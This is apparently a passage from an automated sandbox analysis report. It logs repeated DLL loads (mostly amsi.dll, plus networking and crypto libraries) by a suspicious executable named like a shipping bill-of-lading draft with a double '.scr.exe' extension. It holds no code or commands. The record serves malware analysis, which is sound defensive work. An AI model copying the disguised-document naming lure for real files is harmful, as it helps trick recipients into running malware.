Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: nltdll.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: nltdll.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: ieproxy.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: ieproxy.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: ieproxy.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: mssip32.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: mssip32.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: mssip32.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: smartscreenps.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: smartscreenps.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: smartscreenps.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: winhttpcom.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Section loaded: schannel.dll	Jump to behavior
